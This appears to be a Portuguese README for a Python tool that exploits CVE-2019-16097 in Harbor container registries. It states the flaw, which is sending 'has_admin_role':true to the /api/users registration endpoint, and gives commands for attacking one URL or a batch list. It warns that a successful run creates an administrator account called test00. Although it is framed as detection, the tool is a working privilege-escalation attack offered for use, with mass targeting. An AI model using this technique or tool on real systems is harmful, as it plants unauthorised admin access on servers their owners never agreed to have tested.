
harbor(<1.7.6/1.8.3) escalada de privilégios (CVE-2019-16097)
Em 201909, o Harbor revelou uma vulnerabilidade que permite adicionar administradores usando a função de registro. Utilizando a interface de registro /api/users e construindo o parâmetro POST "has_admin_role":true, é possível adicionar diretamente um administrador.
Esta ferramenta suporta detecção de URL único ou em lote.
Python 2.7
pip install requests
Ajuda de uso: python harbor-give-me-admin.py -h

Detecção de URL único: python harbor-give-me-admin.py -u "https://www.xxx.com/"
// Se bem-sucedido, uma conta de administrador test00 será adicionada. Cuidado!

Detecção em lote: python harbor-give-me-admin.py -f urls.txt
// Se bem-sucedido, uma conta de administrador test00 será adicionada. Cuidado!
Gmail: [email protected]